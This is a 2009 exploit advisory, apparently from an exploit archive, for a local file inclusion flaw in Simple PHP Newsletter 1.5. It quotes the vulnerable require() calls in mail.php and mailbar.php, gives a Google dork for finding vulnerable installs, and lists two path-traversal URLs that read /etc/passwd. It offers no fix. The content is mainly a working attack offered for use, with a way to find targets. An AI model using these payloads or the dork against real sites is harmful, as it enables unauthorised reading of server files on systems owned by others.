Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities

2009-01-16 13:33:44

--:local file include:--
---------------------------------
script:Simple PHP Newsletter 1.5

----------------------------------------------
download from:http://quirm.net/download/23/

----------------------------------------------

...............................................
vul:/mail.php line 11:

if(isset($olang))
{
require("lang/".$olang); line 11
-------------------------------------------
vul:/mailbar.php line 5:

<?php
include("config.inc.php");
if(isset($olang))
{
require("lang/".$olang); line 5
-------------------------------------------


----------------------------------------------------

dork:"Powered by Simple PHP Text newsletter"
----------------------------------------------------

xpl:

http://127.0.0.1/path/mail.php?olang=../../../../../../etc/passwd

http://127.0.0.1/path/mailbar.php?olang=../../../../../../etc/passwd

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [[email protected]]

from:[iran]
---------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.